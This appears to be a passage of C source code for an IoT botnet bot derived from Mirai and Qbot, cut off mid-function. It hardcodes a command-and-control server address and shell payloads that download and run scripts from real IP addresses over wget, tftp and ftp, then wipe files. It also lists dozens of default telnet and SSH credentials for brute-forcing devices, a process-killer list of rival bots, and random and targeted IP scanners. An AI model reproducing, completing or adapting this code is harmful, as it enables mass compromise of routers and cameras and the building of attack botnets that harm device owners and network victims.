#include <stdlib.h>#include <stdarg.h>#include <stdio.h>#include <sys/sock

1. #include <stdlib.h>
2. #include <stdarg.h>
3. #include <stdio.h>
4. #include <sys/socket.h>
5. #include <sys/types.h>
6. #include <netinet/in.h>
7. #include <arpa/inet.h>
8. #include <netdb.h>
9. #include <signal.h>
10. #include <strings.h>
11. #include <sys/utsname.h>
12. #include <unistd.h>
13. #include <fcntl.h>
14. #include <errno.h>
15. #include <netinet/ip.h>
16. #include <netinet/udp.h>
17. #include <netinet/tcp.h>
18. #include <sys/wait.h>
19. #include <sys/ioctl.h>
20. #include <net/if.h>
21. #include <time.h>
22. #include <dirent.h>
23. #include <limits.h>
24. #include <sys/stat.h>
25. #include <sys/time.h>
26. #include <string.h>
27. #include <stdint.h>
28. #include <stdio.h>
29. #include <sys/param.h>
30. #include <sys/time.h>
31. //mirai
32. #define INET_ADDR(o1,o2,o3,o4) (htonl((o1 << 24) | (o2 << 16) | (o3 << 8) | (o4 << 0)))
33. typedef uint32_t ipv4_t;
34. //end of mirai
35. #define PR_SET_NAME 15
36. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
37. #define PAD_RIGHT 1
38. #define PAD_ZERO 2
39. #define PRINT_BUF_LEN 12
40. #define CMD_IAC 255
41. #define CMD_WILL 251
42. #define CMD_WONT 252
43. #define CMD_DO 253
44. #define CMD_DONT 254
45. #define OPT_SGA 3
46. #define SOCKBUF_SIZE 1024
47. #define PHI 0x9e3779b9
48. char *getBuild() {
49. #if defined(__x86_64__) || defined(_M_X64)
50. return "x86_64";
51. #elif defined(__i386) || defined(_M_IX86)
52. return "x86_32";
53. #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
54. return "ARM-4";
55. #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
56. return "ARM-5"
57. #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
58. return "ARM-6";
59. #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
60. return "MIPS";
61. #elif defined(__sh__)
62. return "SUPERH";
63. #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
64. return "POWERPC";
65. #else
66. return "UNKNOWN";
67. #endif
68. }
69. const char *useragents[] = {
70. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
71. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
72. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
73. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
74. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
75. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
76. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
77. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
78. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
79. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
80. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
81. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
82. };
83. struct telstate_t {
84. int fd;
85. unsigned int ip;
86. unsigned char state;
87. unsigned char complete;
88. unsigned char usernameInd; /* username */
89. unsigned char passwordInd; /* password */
90. unsigned char tempDirInd; /* tempdir */
91. unsigned int tTimeout; /* tTimeout */
92. unsigned short bufUsed;
93. char *sockbuf;
94. };
95. int initConnection();
96. void makeRandomStr(unsigned char *buf, int length);
97. int sockprintf(int sock, char *formatStr, ...);
98. char *inet_ntoa(struct in_addr in);
99. int mainCommSock = 0, currentServer = -1;
100. uint32_t *pids;
101. uint32_t scanPid;
102. uint32_t bcmPid;
103. uint32_t testmiraiPid;
104. uint32_t testtelnetPid;
105. uint32_t scanPid;
106. uint32_t miraiPid;
107. uint16_t Phonepid;
108. uint64_t numpids = 0;
109. struct in_addr ourIP;
110. unsigned char macAddress[6] = {0};
111. unsigned char *commServer[] = { "157.230.13.86:52" };
112. int Server_Botport = 52;
113. char* phone[] = {":", "ogin", "sername", "assword", "Linux", "9615-cdp", (char*)0};
114. char *Busybox_Payload = "cd /tmp; busybox wget http://195.201.102.101/bins.sh || busybox curl -O http://195.201.102.101/bins.sh; chmod 777 bins.sh; sh bins.sh; busybox tftp 195.201.102.101 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 195.201.102.101; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh;exit\r\n"; //Telnet Scanner Must implement Busybox.
115. char *Payload = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://157.230.13.86/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 157.230.13.86 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 157.230.13.86; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 157.230.13.86 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *"; //Normal Payload Without busybox Implemented.
116. char *phonepayload = "cd /tmp;rm -rf *;cd /tmp; wget http://157.230.13.86/bins.sh -O phone; chmod 777 phone; ./phone;rm -rf phone\r\n";
117. char *Telnet_Usernames[] = {
118. "telnet\0", //telnet:telnet
119. "root\0", //root:
120. "root\0", //root:1234
121. };
122. char *Telnet_Passwords[] = {
123. "telnet\0", //telnet:telnet
124. "\0", //root:1234
125. "root\0", //root:1234
126. };
127. char *Mirai_Usernames[] = {
128. "telnet\0"
129. "root\0", //root:xc3511
130. "root\0", //root:vizxv
131. "root\0", //root:admin
132. "admin\0", //admin:admin
133. "root\0", //root:888888
134. "root\0", //root:xmhdipc
135. "root\0", //root:default
136. "root\0", //root:juantech
137. "root\0", //root:123456
138. "root\0", //root:54321
139. "support\0", //support:support
140. "root\0", //root:(none)
141. "admin\0", //admin:password
142. "root\0", //root:root
143. "root\0", //root:12345
144. "user\0", //user:user
145. "admin\0", //admin:(none)
146. "root\0", //root:pass
147. "admin\0", //admin:admin1234
148. "root\0", //root:1111
149. "admin\0", //admin:smcadmin
150. "admin\0", //admin:1111
151. "root\0", //root:666666
152. "root\0", //root:password
153. "root\0", //root:1234
154. "root\0", //root:klv123
155. "Administrator\0", //Administrator:admin
156. "service\0", //service:service
157. "supervisor\0", //supervisor:supervisor
158. "guest\0", //guest:guest
159. "guest\0", //guest:12345
160. "guest\0", //guest:12345
161. "admin1\0", //admin1:password
162. "administrator\0", //administrator:1234
163. "666666\0", //666666:666666
164. "888888\0", //888888:888888
165. "ubnt\0", //ubnt:ubnt
166. "klv1234\0", //root:klv1234
167. "Zte521\0", //root:Zte521
168. "hi3518\0", //root:hi3518
169. "jvbzd\0", //root:jvbzd
170. "anko\0", //root:anko
171. "zlxx\0", //root:zlxx
172. "7ujMko0vizxv\0", //root:7ujMko0vizxv
173. "7ujMko0admin\0", //root:7ujMko0admin
174. "system\0", //root:system
175. "ikwb\0", //root:ikwb
176. "dreambox\0", //root:dreambox
177. "user\0", //root:user
178. "realtek\0", //root:realtek
179. "00000000\0", //root:00000000
180. "1111111\0", //admin:1111111
181. "1234\0", //admin:1234
182. "12345\0", //admin:12345
183. "54321\0", //admin:54321
184. "123456\0", //admin:123456
185. "7ujMko0admin\0", //admin:7ujMko0admin
186. "1234\0", //admin:1234
187. "pass\0", //admin:pass
188. "meinsm\0", //admin:meinsm
189. "tech\0", //tech:tech
190. "fucker\0", //mother:fucker
191. "pi\0", //mother:fucker
192. };
193. char *Mirai_Passwords[] = {
194. "telnet\0"
195. "xc3511\0", //root:xc3511
196. "vizxv\0", //root:vizxv
197. "admin\0", //root:admin
198. "admin\0", //admin:admin
199. "888888\0", //root:888888
200. "xmhdipc\0", //root:xmhdipc
201. "default\0", //root:default
202. "juantech\0", //root:juantech
203. "123456\0", //root:123456
204. "54321\0", //root:54321
205. "support\0", //support:support
206. "\0", //root:(none)
207. "password\0", //admin:password
208. "root\0", //root:root
209. "12345\0", //root:12345
210. "user\0", //user:user
211. "\0", //admin:(none)
212. "pass\0", //root:pass
213. "admin1234\0", //admin:admin1234
214. "1111\0", //root:1111
215. "smcadmin\0", //admin:smcadmin
216. "1111\0", //admin:1111
217. "666666\0", //root:666666
218. "password\0", //root:password
219. "1234\0", //root:1234
220. "klv123\0", //root:klv123
221. "admin\0", //Administrator:admin
222. "service\0", //service:service
223. "supervisor\0", //supervisor:supervisor
224. "guest\0", //guest:guest
225. "12345\0", //guest:12345
226. "123456\0", //guest:12345
227. "password\0", //admin1:password
228. "1234\0", //administrator:1234
229. "666666\0", //666666:666666
230. "888888\0", //888888:888888
231. "ubnt\0", //ubnt:ubnt
232. "klv1234\0", //root:klv1234
233. "Zte521\0", //root:Zte521
234. "hi3518\0", //root:hi3518
235. "jvbzd\0", //root:jvbzd
236. "anko\0", //root:anko
237. "zlxx\0", //root:zlxx
238. "7ujMko0vizxv\0", //root:7ujMko0vizxv
239. "7ujMko0admin\0", //root:7ujMko0admin
240. "system\0", //root:system
241. "ikwb\0", //root:ikwb
242. "dreambox\0", //root:dreambox
243. "user\0", //root:user
244. "realtek\0", //root:realtek
245. "00000000\0", //root:00000000
246. "1111111\0", //admin:1111111
247. "1234\0", //admin:1234
248. "12345\0", //admin:12345
249. "54321\0", //admin:54321
250. "123456\0", //admin:123456
251. "7ujMko0admin\0", //admin:7ujMko0admin
252. "1234\0", //admin:1234
253. "pass\0", //admin:pass
254. "meinsm\0", //admin:meinsm
255. "tech\0", //tech:tech
256. "fucker\0", //mother:fucker
257. "raspberry\0", //mother:fucker
258.  
259. };
260. char *SSH_Usernames[] = {
261. "root\0", //root:root
262. "admin\0", //admin:admin
263. "admin\0", //admin:1234
264. "ubnt\0", //ubnt:ubnt
265. "pi\0", //mother:fucker
266. };
267. char *SSH_Passwords[] = {
268. "root\0", //root:root
269. "admin\0", //admin:admin
270. "1234\0", //admin:1234
271. "ubnt\0", //ubnt:ubnt
272. "raspberry\0", //mother:fucker
273. };
274. char *Bot_Killer_Binarys[] = {
275. "mips",
276. "mipsel",
277. "sh4",
278. "x86",
279. "i686",
280. "ppc",
281. "i586",
282. "i586",
283. "jack*",
284. "hack*",
285. "arm*"
286. "tel*"
287. "b1",
288. "b2",
289. "b3",
290. "b4",
291. "b5",
292. "b6",
293. "b7",
294. "b8",
295. "b9",
296. "lol*",
297. "busybox*",
298. "badbox*",
299. "DFhxdhdf",
300. "dvrHelper",
301. "FDFDHFC",
302. "FEUB",
303. "FTUdftui",
304. "GHfjfgvj",
305. "jhUOH",
306. "JIPJIPJj",
307. "JIPJuipjh",
308. "kmyx86_64",
309. "lolmipsel",
310. "mips",
311. "mipsel",
312. "RYrydry",
313. "TwoFace*",
314. "UYyuyioy",
315. "wget",
316. "x86_64",
317. "XDzdfxzf",
318. "xx*",
319. "sh",
320. "1",
321. "2",
322. "3",
323. "4",
324. "5",
325. "6",
326. "7",
327. "8",
328. "9",
329. "10",
330. "11",
331. "12",
332. "13",
333. "14",
334. "15",
335. "16",
336. "17",
337. "18",
338. "19",
339. "20",
340. "busybox",
341. "badbox",
342. "Mirai*",
343. "mirai*",
344. "cunty*",
345. "IoT*",
346. "pl0*",
347. "cc*"
348. };
349. char *Temp_Directorys[] = {"/tmp/*", "/var/*", "/var/run/*", "/var/tmp/*", (char*) 0};
350. char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
351. char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
352. char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
353. char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
354. static uint32_t Q[4096], c = 362436;
355. void init_rand(uint32_t x) {
356. int i;
357. Q[0] = x;
358. Q[1] = x + PHI;
359. Q[2] = x + PHI + PHI;
360. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
361. }
362. uint32_t rand_cmwc(void) {
363. uint64_t t, a = 18782LL;
364. static uint32_t i = 4095;
365. uint32_t x, r = 0xfffffffe;
366. i = (i + 1) & 4095;
367. t = a * Q[i] + c;
368. c = (uint32_t)(t >> 32);
369. x = t + c;
370. if (x < c) {
371. x++;
372. c++;
373. }
374. return (Q[i] = r - x);
375. }
376. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
377. {
378. int got = 1, total = 0;
379. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
380. return got == 0 ? NULL : buffer;
381. }
382. int contains_string(char* buffer, char** strings) {
383. int num_strings = 0, i = 0;
384. for(num_strings = 0; strings[++num_strings] != 0; );
385. for(i = 0; i < num_strings; i++) {
386. if(strcasestr(buffer, strings[i])) {
387. return 1;
388. }
389. }
390. return 0;
391. }
392. int contains_success(char* buffer) {
393. return contains_string(buffer, successes);
394. }
395. int contains_fail(char* buffer) {
396. return contains_string(buffer, fails);
397. }
398. int contains_response(char* buffer) {
399. return contains_success(buffer) || contains_fail(buffer);
400. }
401. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
402. fd_set read_set;
403. struct timeval tv;
404. tv.tv_sec = 0;
405. tv.tv_usec = timeout_usec;
406. FD_ZERO(&read_set);
407. FD_SET(fd, &read_set);
408. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
409. return 0;
410. return recv(fd, buffer, buf_size, 0);
411. }
412. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
413. int num_bytes, i;
414. memset(buffer, 0, buf_size);
415. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
416. if(buffer[0] == 0xFF) {
417. negotiate(fd, buffer, 3);
418. }
419. if(contains_string(buffer, strings)) {
420. return 1;
421. }
422. return 0;
423. }
424. const char* get_telstate_host(struct telstate_t* telstate) { // get host
425. struct in_addr in_addr_ip;
426. in_addr_ip.s_addr = telstate->ip;
427. return inet_ntoa(in_addr_ip);
428. }
429. void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
430. if(new_state == 0) {
431. close(telstate->fd);
432. }
433. telstate->tTimeout = 0;
434. telstate->state = new_state;
435. memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
436. }
437. void reset_telstate(struct telstate_t* telstate) { // reset
438. advance_telstate(telstate, 0);
439. telstate->complete = 1;
440. }
441. void trim(char *str) {
442. int i;
443. int begin = 0;
444. int end = strlen(str) - 1;
445. while (isspace(str[begin])) begin++;
446. while ((end >= begin) && isspace(str[end])) end--;
447. for (i = begin; i <= end; i++) str[i - begin] = str[i];
448. str[i - begin] = '\0';
449. }
450. static void printchar(unsigned char **str, int c) {
451. if (str) {
452. **str = c;
453. ++(*str);
454. }
455. else (void)write(1, &c, 1);
456. }
457. static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
458. register int pc = 0, padchar = ' ';
459. if (width > 0) {
460. register int len = 0;
461. register const unsigned char *ptr;
462. for (ptr = string; *ptr; ++ptr) ++len;
463. if (len >= width) width = 0;
464. else width -= len;
465. if (pad & PAD_ZERO) padchar = '0';
466. }
467. if (!(pad & PAD_RIGHT)) {
468. for ( ; width > 0; --width) {
469. printchar (out, padchar);
470. ++pc;
471. }
472. }
473. for ( ; *string ; ++string) {
474. printchar (out, *string);
475. ++pc;
476. }
477. for ( ; width > 0; --width) {
478. printchar (out, padchar);
479. ++pc;
480. }
481. return pc;
482. }
483. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
484. unsigned char print_buf[PRINT_BUF_LEN];
485. register unsigned char *s;
486. register int t, neg = 0, pc = 0;
487. register unsigned int u = i;
488. if (i == 0) {
489. print_buf[0] = '0';
490. print_buf[1] = '\0';
491. return prints (out, print_buf, width, pad);
492. }
493. if (sg && b == 10 && i < 0) {
494. neg = 1;
495. u = -i;
496. }
497. s = print_buf + PRINT_BUF_LEN-1;
498. *s = '\0';
499. while (u) {
500. t = u % b;
501. if( t >= 10 )
502. t += letbase - '0' - 10;
503. *--s = t + '0';
504. u /= b;
505. }
506. if (neg) {
507. if( width && (pad & PAD_ZERO) ) {
508. printchar (out, '-');
509. ++pc;
510. --width;
511. }
512. else {
513. *--s = '-';
514. }
515. }
516. return pc + prints (out, s, width, pad);
517. }
518. static int print(unsigned char **out, const unsigned char *format, va_list args ) {
519. register int width, pad;
520. register int pc = 0;
521. unsigned char scr[2];
522. for (; *format != 0; ++format) {
523. if (*format == '%') {
524. ++format;
525. width = pad = 0;
526. if (*format == '\0') break;
527. if (*format == '%') goto out;
528. if (*format == '-') {
529. ++format;
530. pad = PAD_RIGHT;
531. }
532. while (*format == '0') {
533. ++format;
534. pad |= PAD_ZERO;
535. }
536. for ( ; *format >= '0' && *format <= '9'; ++format) {
537. width *= 10;
538. width += *format - '0';
539. }
540. if( *format == 's' ) {
541. register char *s = (char *)va_arg( args, int );
542. pc += prints (out, s?s:"(null)", width, pad);
543. continue;
544. }
545. if( *format == 'd' ) {
546. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
547. continue;
548. }
549. if( *format == 'x' ) {
550. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
551. continue;
552. }
553. if( *format == 'X' ) {
554. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
555. continue;
556. }
557. if( *format == 'u' ) {
558. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
559. continue;
560. }
561. if( *format == 'c' ) {
562. scr[0] = (unsigned char)va_arg( args, int );
563. scr[1] = '\0';
564. pc += prints (out, scr, width, pad);
565. continue;
566. }
567. }
568. else {
569. out:
570. printchar (out, *format);
571. ++pc;
572. }
573. }
574. if (out) **out = '\0';
575. va_end( args );
576. return pc;
577. }
578. int zprintf(const unsigned char *format, ...) {
579. va_list args;
580. va_start( args, format );
581. return print( 0, format, args );
582. }
583. int szprintf(unsigned char *out, const unsigned char *format, ...) {
584. va_list args;
585. va_start( args, format );
586. return print( &out, format, args );
587. }
588. int sockprintf(int sock, char *formatStr, ...) {
589. unsigned char *textBuffer = malloc(2048);
590. memset(textBuffer, 0, 2048);
591. char *orig = textBuffer;
592. va_list args;
593. va_start(args, formatStr);
594. print(&textBuffer, formatStr, args);
595. va_end(args);
596. orig[strlen(orig)] = '\n';
597. zprintf("%s\n", orig);
598. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
599. free(orig);
600. return q;
601. }
602. int wildString(const unsigned char* pattern, const unsigned char* string) {
603. switch(*pattern) {
604. case '\0': return *string;
605. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
606. case '?': return !(*string && !wildString(pattern+1, string+1));
607. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
608. }
609. }
610. int getHost(unsigned char *toGet, struct in_addr *i) {
611. struct hostent *h;
612. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
613. return 0;
614. }
615. void makeRandomStr(unsigned char *buf, int length) {
616. int i = 0;
617. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
618. }
619. int recvLine(int socket, unsigned char *buf, int bufsize) {
620. memset(buf, 0, bufsize);
621. fd_set myset;
622. struct timeval tv;
623. tv.tv_sec = 30;
624. tv.tv_usec = 0;
625. FD_ZERO(&myset);
626. FD_SET(socket, &myset);
627. int selectRtn, retryCount;
628. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
629. while(retryCount < 10) {
630. tv.tv_sec = 30;
631. tv.tv_usec = 0;
632. FD_ZERO(&myset);
633. FD_SET(socket, &myset);
634. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
635. retryCount++;
636. continue;
637. }
638. break;
639. }
640. }
641. unsigned char tmpchr;
642. unsigned char *cp;
643. int count = 0;
644. cp = buf;
645. while(bufsize-- > 1) {
646. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
647. *cp = 0x00;
648. return -1;
649. }
650. *cp++ = tmpchr;
651. if(tmpchr == '\n') break;
652. count++;
653. }
654. *cp = 0x00;
655. return count;
656. }
657. int connectTimeout(int fd, char *host, int port, int timeout) {
658. struct sockaddr_in dest_addr;
659. fd_set myset;
660. struct timeval tv;
661. socklen_t lon;
662. int valopt;
663. long arg = fcntl(fd, F_GETFL, NULL);
664. arg |= O_NONBLOCK;
665. fcntl(fd, F_SETFL, arg);
666. dest_addr.sin_family = AF_INET;
667. dest_addr.sin_port = htons(port);
668. if(getHost(host, &dest_addr.sin_addr)) return 0;
669. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
670. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
671. if (res < 0) {
672. if (errno == EINPROGRESS) {
673. tv.tv_sec = timeout;
674. tv.tv_usec = 0;
675. FD_ZERO(&myset);
676. FD_SET(fd, &myset);
677. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
678. lon = sizeof(int);
679. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
680. if (valopt) return 0;
681. }
682. else return 0;
683. }
684. else return 0;
685. }
686. arg = fcntl(fd, F_GETFL, NULL);
687. arg &= (~O_NONBLOCK);
688. fcntl(fd, F_SETFL, arg);
689. return 1;
690. }
691. int listFork() {
692. uint32_t parent, *newpids, i;
693. parent = fork();
694. if (parent <= 0) return parent;
695. numpids++;
696. newpids = (uint32_t*)malloc((numpids + 1) * 4);
697. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
698. newpids[numpids - 1] = parent;
699. free(pids);
700. pids = newpids;
701. return parent;
702. }
703. int negotiate(int sock, unsigned char *buf, int len) {
704. unsigned char c;
705. switch (buf[1]) {
706. case CMD_IAC: return 0;
707. case CMD_WILL:
708. case CMD_WONT:
709. case CMD_DO:
710. case CMD_DONT:
711. c = CMD_IAC;
712. send(sock, &c, 1, MSG_NOSIGNAL);
713. if (CMD_WONT == buf[1]) c = CMD_DONT;
714. else if (CMD_DONT == buf[1]) c = CMD_WONT;
715. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
716. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
717. send(sock, &c, 1, MSG_NOSIGNAL);
718. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
719. break;
720. default:
721. break;
722. }
723. return 0;
724. }
725. int matchPrompt(char *bufStr) {
726. char *prompts = ":>%$#\0";
727. int bufLen = strlen(bufStr);
728. int i, q = 0;
729. for(i = 0; i < strlen(prompts); i++) {
730. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
731. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
732. }
733. return 0;
734. }
735. uint8_t ipState[5] = {0};
736. in_addr_t getRandomPublicIP() {
737. ipState[0] = rand() % 223;
738. ipState[1] = rand() % 255;
739. ipState[2] = rand() % 255;
740. ipState[3] = rand() % 255;
741. while(
742. (ipState[0] == 0) ||
743. (ipState[0] == 10) ||
744. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
745. (ipState[0] == 127) ||
746. (ipState[0] == 169 && ipState[1] == 254) ||
747. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
748. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
749. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
750. (ipState[0] == 192 && ipState[1] == 168) ||
751. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
752. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
753. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
754. (ipState[0] >= 224)
755. )
756. {
757. ipState[0] = rand() % 223;
758. ipState[1] = rand() % 255;
759. ipState[2] = rand() % 255;
760. ipState[3] = rand() % 255;
761. }
762. char ip[16] = {0};
763. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
764. return inet_addr(ip);
765. }
766. in_addr_t BCMSCAN()
767. {
768. ipState[0] = 0;
769. ipState[1] = 0;
770. ipState[2] = 0;
771. ipState[3] = 0;
772. ipState[0] = rand() % 255;
773. ipState[1] = rand() % 255;
774. ipState[2] = rand() % 255;
775. ipState[3] = rand() % 255;
776. int randnum = rand() % 37;
777. char ip[16];
778. if(randnum == 0)
779. {
780. szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
781. }
782. if(randnum == 1)
783. {
784. szprintf(ip, "146.158.%d.%d", ipState[2], ipState[3]);
785. }
786. if(randnum == 2)
787. {
788. szprintf(ip, "185.4.%d.%d", ipState[2], ipState[3]);
789. }
790. if(randnum == 3)
791. {
792. szprintf(ip, "188.76.%d.%d", ipState[2], ipState[3]);
793. }
794. if(randnum == 4)
795. {
796. szprintf(ip, "188.77.%d.%d", ipState[2], ipState[3]);
797. }
798. if(randnum == 5)
799. {
800. szprintf(ip, "188.78.%d.%d", ipState[2], ipState[3]);
801. }
802. if(randnum == 6)
803. {
804. szprintf(ip, "188.79.%d.%d", ipState[2], ipState[3]);
805. }
806. if(randnum == 7)
807. {
808. szprintf(ip, "212.106.%d.%d", ipState[2], ipState[3]);
809. }
810. if(randnum == 8)
811. {
812. szprintf(ip, "212.9.%d.%d", ipState[2], ipState[3]);
813. }
814. if(randnum == 9)
815. {
816. szprintf(ip, "213.179.%d.%d", ipState[2], ipState[3]);
817. }
818. if(randnum == 10)
819. {
820. szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
821. }
822. if(randnum == 11)
823. {
824. szprintf(ip, "37.132.%d.%d", ipState[2], ipState[3]);
825. }
826. if(randnum == 12)
827. {
828. szprintf(ip, "37.133.%d.%d", ipState[2], ipState[3]);
829. }
830. if(randnum == 13)
831. {
832. szprintf(ip, "37.134.%d.%d", ipState[2], ipState[3]);
833. }
834. if(randnum == 14)
835. {
836. szprintf(ip, "37.135.%d.%d", ipState[2], ipState[3]);
837. }
838. if(randnum == 15)
839. {
840. szprintf(ip, "37.14.%d.%d", ipState[2], ipState[3]);
841. }
842. if(randnum == 16)
843. {
844. szprintf(ip, "37.15.%d.%d", ipState[2], ipState[3]);
845. }
846. if(randnum == 17)
847. {
848. szprintf(ip, "37.35.%d.%d", ipState[2], ipState[3]);
849. }
850. if(randnum == 18)
851. {
852. szprintf(ip, "37.97.%d.%d", ipState[2], ipState[3]);
853. }
854. if(randnum == 19)
855. {
856. szprintf(ip, "62.14.%d.%d", ipState[2], ipState[3]);
857. }
858. if(randnum == 20)
859. {
860. szprintf(ip, "87.216.%d.%d", ipState[2], ipState[3]);
861. }
862. if(randnum == 21)
863. {
864. szprintf(ip, "87.217.%d.%d", ipState[2], ipState[3]);
865. }
866. if(randnum == 22)
867. {
868. szprintf(ip, "87.218.%d.%d", ipState[2], ipState[3]);
869. }
870. if(randnum == 23)
871. {
872. szprintf(ip, "87.219.%d.%d", ipState[2], ipState[3]);
873. }
874. if(randnum == 24)
875. {
876. szprintf(ip, "87.220.%d.%d", ipState[2], ipState[3]);
877. }
878. if(randnum == 25)
879. {
880. szprintf(ip, "87.221.%d.%d", ipState[2], ipState[3]);
881. }
882. if(randnum == 26)
883. {
884. szprintf(ip, "87.222.%d.%d", ipState[2], ipState[3]);
885. }
886. if(randnum == 27)
887. {
888. szprintf(ip, "87.223.%d.%d", ipState[2], ipState[3]);
889. }
890. if(randnum == 28)
891. {
892. szprintf(ip, "90.94.%d.%d", ipState[2], ipState[3]);
893. }
894. if(randnum == 29)
895. {
896. szprintf(ip, "92.191.%d.%d", ipState[2], ipState[3]);
897. }
898. if(randnum == 30)
899. {
900. szprintf(ip, "95.16.%d.%d", ipState[2], ipState[3]);
901. }
902. if(randnum == 31)
903. {
904. szprintf(ip, "95.17.%d.%d", ipState[2], ipState[3]);
905. }
906. if(randnum == 32)
907. {
908. szprintf(ip, "95.18.%d.%d", ipState[2], ipState[3]);
909. }
910. if(randnum == 33)
911. {
912. szprintf(ip, "95.19.%d.%d", ipState[2], ipState[3]);
913. }
914. if(randnum == 34)
915. {
916. szprintf(ip, "95.20.%d.%d", ipState[2], ipState[3]);
917. }
918. if(randnum == 35)
919. {
920. szprintf(ip, "95.21.%d.%d", ipState[2], ipState[3]);
921. }
922. if(randnum == 36)
923. {
924. szprintf(ip, "95.22.%d.%d", ipState[2], ipState[3]);
925. }
926. if(randnum == 37)
927. {
928. szprintf(ip, "95.23.%d.%d", ipState[2], ipState[3]);
929. }
930. return inet_addr(ip);
931. }
932. in_addr_t PhoneScan(){
933. ipState[0] = 0;
934. ipState[1] = 0;
935. ipState[2] = 0;
936. ipState[3] = 0;
